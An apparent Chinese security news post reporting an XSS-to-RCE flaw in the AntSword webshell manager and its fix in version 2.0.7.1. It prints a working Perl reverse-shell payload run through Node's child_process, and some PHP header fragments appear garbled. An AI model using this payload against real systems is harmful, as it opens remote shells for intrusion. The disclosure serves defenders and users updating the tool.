中國蟻劍是一款開源的跨平臺網站管理工具,它主要面向於合法授權的滲透測試安全人員以及進行常規操作的網站管理員。
4月12日凌晨,有用戶在中國蟻劍GitHub上提交了issue,稱發現中國蟻劍存在XSS漏洞,藉此可引起RCE。據悉,該漏洞是因為在webshell遠程連接失敗時,中國蟻劍會返回錯誤信息,但因為使用的是html解析,導致xss漏洞。
當通過中國蟻劍連接webshell,出現連接失敗情況時,中國蟻劍會返回錯誤信息,如下圖:
而該信息並沒有進行 XSS 保護,因此能夠利用 js 調用 perl 便可反彈攻擊者的shell。
header('HTTP/1.1 500 ![]()
');
');
反彈shell的exp (for perl)如下,使用base64編碼:
header("HTTP/1.1 406 Not ![]()
");
?>
base64_decode code
require('child_process').exec('perl -e \'use Socket;$i="127.0.0.1";$p=1002;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\'',(error, stdout, stderr)=>{
alert(`stdout: ${stdout}`);
});
成功反彈攻擊者shell:
在該漏洞問題被提出之後,中國蟻劍的作者在今天上午對該問題及時做出了響應,並且及時發佈了中國蟻劍的新版本 AntSword v2.0.7.1。
在最新的版本中,為了防止插件中 toastr 出現類似問題, 修改了 toastr 可以輸出 html 的特點,以後均不支持輸出 html。對於所有使用中國蟻劍舊版本的用戶,建議及時更新到最新版本。
參考鏈接
1.https://github.com/AntSwordProject/antSword/issues/147
2.https://www.jianshu.com/p/6457e8b4a16b
分享到:
閱讀更多 A1d2m3i4n5 的文章
